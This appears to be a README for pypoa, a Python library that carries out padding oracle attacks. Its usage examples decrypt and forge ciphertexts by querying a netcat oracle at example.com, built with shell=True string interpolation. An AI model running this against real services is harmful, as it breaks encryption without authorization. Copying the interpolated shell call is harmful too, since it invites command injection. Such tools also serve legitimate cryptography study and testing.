A python module to perform the Padding Oracle Attack. It can both decrypt and encrypt messages.
git clone https://github.com/Dukezo/pypoa.git
pip install .Clone the repository, install the package and you are ready to go.
Decrypting ciphertexts:
class MyOracle(pypoa.Oracle):
def validate(self, payload):
proc = subprocess.Popen("echo %s | nc example.com 12345" % payload, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
output = str(proc.communicate()[0])
return "invalid padding" not in output
ciphertext = "2495de02c6af8378db81b410c54cc3f75da4c0d4122d1c597496dd5b00038a32a333bcbabe327bd8292ca295fc8003463fe4c235a502d994d85a1332890ee080b8fd160937f260aa5449b2e05e8464cf"
IV = binascii.hexlify(b"This is an IV456").decode("ascii")
plaintext = pypoa.decrypt(ciphertext, 16, MyOracle(), IV)Encrypting plaintexts:
class MyOracle(pypoa.Oracle):
def validate(self, payload):
proc = subprocess.Popen("echo %s | nc example.com 12345" % payload, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
output = str(proc.communicate()[0])
return "invalid padding" not in output
plaintext = 'Top secret message'
ciphertext = pypoa.encrypt(plaintext, 16, MyOracle())See the LICENSE file for license rights and limitations (MIT).